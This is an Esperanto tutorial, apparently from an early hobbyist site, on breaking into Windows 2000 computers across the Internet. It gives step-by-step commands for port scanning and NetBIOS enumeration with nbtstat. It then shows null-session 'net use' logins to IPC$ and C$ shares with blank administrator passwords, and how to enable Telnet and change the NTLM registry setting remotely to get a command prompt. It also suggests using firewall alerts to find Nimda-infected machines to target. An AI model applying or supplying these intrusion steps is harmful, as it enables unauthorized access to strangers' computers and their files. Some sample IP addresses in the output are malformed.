Kiel trovi kaj "haki" Vindozajn komputilojn sur la Interreto (pere de Windows 2000 komputilo)

Mi montros cxi-tie nur unu metodon por trovi kaj eniri Vindozan komputilon sur la Interreto. Ekzistas multaj tekstoj en aliaj lingvoj pri tiu temo (vidu, ekz. http://www.astalavista.com, http://www.happyhacker.org), kaj oni esperas ke aperos plu cxi-teme en Esperanto. Do, ek al la laboro.

1. Trovi la komputilojn.

Unu metodo estas uzi skanilon - por trovi malfermitajn pordetojn sur komputiloj. Ekzemple, uzu la programon "Superscan", kaj sercxu por IP adresojn inter specifa limo (ekz 192.168.0.1 - 192.168.255.255). Sed, por haki vindozan komputilon, ni devas sercxi ankaux por specifajn pordetojn - specife 139, kaj 1025. Do skanu nur por tiuj du pordetoj. Tio estas la unua metodo.

Sed, cxu ne estus bona, se ekzistus programo kiu sendus al vi liston de tiuj komputiloj, sen neceson skani la tutan Interreton por ili? Fakte, ekzistas tiajn programojn. Ili nomigxas "fajrbarilojn", ekz. "Black Ice", aux "Zone Alarm". Ordinare oni pensas ke tiuj programoj nur anoncas verajn hakistojn al vi. Sed efektive, pro Virusojn kiel la Nimda, tiuj fajrbariloj ankaux anoncas al vi komputilojn kiuj estas kompromititaj (hakitaj) pere de tiuj virusoj. Tio estas pro la kauxzo, ke tiuj virusoj kauxzas la atakitajn komputilojn ankaux ataki aliajn komputilojn (sen ke la propra posedanto de tiu komputilo scius ion pri tio). Tiuj virusoj ankaux malfermas la pordetojn kiuj interesas nin (139, 1025), kaj ankaux nuligas la administratoran pasvorton de la komputilo - kauzante ke oni povas tuj eniri tiujn komputilojn.

Do, se vi uzas fajrbarilojn - kiel vi scios kiu atako estas de vera hakisto, kaj kiu atako estas de tiuj jam hakitaj komputiloj? Tiel vi scios: Kiam via programo anoncas al vi ke oni provas haki vin, rigardu la informojn pri la "hakisto". Se vi vidas tiun kombinon: UDP Port Probe, TCP Port Probe, IIS System32 Command - vi scios preskaux sendube ke tiu komputilo jam estis kompromitita pere de la Nimda (aux simila) viruso.

Do, nun ke vi jam trovis la komputilojn, kion fari?

2. Eniri la komputilojn.

Iru al DOS instigilo (prompt), kaj tajpu nbtstat -a [ip addreson de la komputilo]

Ekzemple:

C:\>nbtstat -a 192.168.40.63

Intel Pro 100:
Node IpAddress: [193.142.33.24] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    UZANTO         <00>  UNIQUE      Registered
    UZANTO         <20>  UNIQUE      Registered
    KOMPUTILO      <00>  GROUP       Registered
    KOMPUTILO      <1C>  GROUP       Registered
    KOMPUTILO      <1B>  UNIQUE      Registered
    KOMPUTILO      <1E>  GROUP       Registered
    KOMPUTILO      <1D>  UNIQUE      Registered
    INet~Services  <1C>  GROUP       Registered
    ..__MSBROWSE__.<01>  GROUP       Registered
    ADMINISTRATOR  <03>  UNIQUE      Registered

    MAC Address = 00-60-E4-93-FD-3C

Do, nun vi jam vidas la nomon de de la uzanto <03>, kaj ke la komputilo havas atingeblajn dosierojn <20>. Kion fari por atingi ilin?

Se ni iras al Start, Run, (Komenci, Lancxi) kaj eniras la IP adreson de la komputilo tiel: \\192.168.40.63, ni versjajne vidos mesagxon kiu diras ke ni ne havas permeson eniri. (Fakte, eble vi ne volus fari tion, cxar gxi sendus vian nunan pasvorton al tiu komputilo). Do, ni reiru al la DOS instigilo kaj tajpu unu de la sekvantaj komandoj, gxis sukceso:

net use \\192.168.40.63\ipc$ "" /user:""
net use \\192.168.40.63\ipc$ "" /user:administrator
net use \\192.168.40.63\ipc$ "" /user:UZANTO (metu cxi-tie la nomon kiun vi vidis pere de nbtstat -a).

Tiuj komandoj estas por akiri permeson eniri tiun komputilon sur la Interreto, pere de IPC$. Ili sendas la nomon de la uzanto, kaj nulan pasvorton. Sed, eble ni volas vidi kion ili havas sur iliaj dur-diskoj (C$, D$, ktp.)? Do ni tajpu unu de cxi-tiuj (gxis sukceso):

net use \\192.168.40.63\c$ "" /user:""
net use \\192.168.40.63\c$ "" /user:administrator
net use \\192.168.40.63\c$ "" /user:UZANTO

Nun, reiru al Start, Run (Komenci, Lancxi) - \\192.168.40.63\c$, kaj post kelkaj sekundoj vi vidos la enhavon de ilia dur-disko. Sed jxus nun, ni ne interesigxas tro multe pri tio. Plu gravas akiri DOS instigilo sur ilia komputilo, tiel ke ni povas eniri komandojn sur ilia komputilo mem.

3. Krei telnet sesion kun la komputilo.

Iru al Start - Programs - Administrative Tools - Computer Management (Komenci - Lancxi - Programoj - Administratoraj Iloj - Komputila Administrado). Dekstre-klaku al Computer Management (Komputila Administrado), elektu "Connect to another computer" (Kontakti al alia komputilo). Enmetu la IP adreson de la komputilo - 192.168.49.63. Se tio estas Windows 2000 komputilo, vi povas iri al Services (Servoj), lancxi la servon Telnet, kaj sxangxi gxin al "Automatic" (auxtomata). Ni ankaux devas cxesigi NTLM, por ke nia Telnet sesio sukcesos. Start - Run - Regedit - Connect Network Registry (Komenci - Lancxi - regedit - Ligi Retan Registron) - eniru la adreson (192.168.40.63), iru al:

HKEY_LOCAL_MACHINE--Software--Microsoft--Telnet Server--1.0—->NTLM

Sxangxu la numeron de (2) al (1). Nun reiru al la DOS instigilo, kaj tajpu:

telnet 192.168.40.63

Se gxi demandas cxu vi volas sendi vian nunan pasvorton, diru ne, kaj poste, por la uzanto metu "Administrator", kaj por la pasvorto, metu nenion. Tiam, vi vidos DOS instigilon sur la masxino sur kiu vi volis eniri. Kion fari nun?

4. Fari ion sur la komputilo

Mi sugestas ke, se vi sukcesas eniri la komputilon, vi unue kontrolu la efikojn de la Nimda viruso sur tiu masxino. Se gxi havas la viruson, vi vidos ke gxi provas kontakti kaj infekti longan liston de aliaj komputiloj.

c:\netstat

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    Komputilo:telnet    user-192-168-62-170.ISP.net:1852  ESTABLISHED
  TCP    Komputilo:microsoft-ds  user-192-168-62-170.ISP.net:1842  ESTABLISHED
  TCP    Komputilo:1202      user-192-168-32-166.ISP.net:http  TIME_WAIT
  TCP    Komputilo:1471      user-192-168-6-81.ISP.net:http  ESTABLISHED
  TCP    Komputilo:pptp      192-90-234-2.nyc.rr.com:http  ESTABLISHED
  TCP    Komputilo:1822      user-192-168-98-98.ISP.net:http  ESTABLISHED
  TCP    Komputilo:2074      CPE00104c10a480.cpe.net.cable.rogers.com:microsoft-ds  SYN_SENT
  TCP    Komputilo:2075      CPE00104c10a480.cpe.net.cable.rogers.com:netbios-ssn  SYN_SENT
  TCP    Komputilo:2121      192.114.93.188:http     ESTABLISHED
  TCP    Komputilo:2175      192.225.165.162:http    SYN_SENT
  TCP    Komputilo:2176      192.156.115.22:http     SYN_SENT
  TCP    Komputilo:2178      192.168.253.160:http    SYN_SENT
  TCP    Komputilo:2179      user-192-168-122-145.ISP.net:http  SYN_SENT
  TCP    Komputilo:2181      user-192-168-153-252.ISP.net:http  SYN_SENT
  TCP    Komputilo:2182      user-192-168-29-128.ISP.net:http  SYN_SENT
  TCP    Komputilo:2184      user-192-168-185-1929.ISP.net:http  SYN_SENT
  TCP    Komputilo:2187      192.168.2192.177:http    SYN_SENT
  TCP    Komputilo:2188      user-192-168-1192-132.ISP.net:http  SYN_SENT
  TCP    Komputilo:2189      user-192-168-198-47.ISP.net:http  SYN_SENT
  TCP    Komputilo:2190      user-192-168-173-1922.ISP.net:http  SYN_SENT
  TCP    Komputilo:2192      192.168.1926.177:http    SYN_SENT
  TCP    Komputilo:2193      user-192-168-105-30.ISP.net:http  SYN_SENT
  TCP    Komputilo:2196      192.168.234.220:http    SYN_SENT
  TCP    Komputilo:2197      user-192-168-93-73.ISP.net:http  SYN_SENT
  TCP    Komputilo:2198      user-192-168-92-92.ISP.net:http  SYN_SENT
  ktp, ktp,......

Krom tio, uzu vian imagon.... aux legu plu da dosieroj pri hakado, kaj traduku ilin esperanten.

Case2021

[Enkonduko] [Aparataro] [Entreprenoj] [Historio] [Interreto] [Libroj,artikoloj] [Mastrumaj sistemoj] [Novaĵoj] [Programaro] [Tiparoj] [Vortaroj] [Retadresoj]

---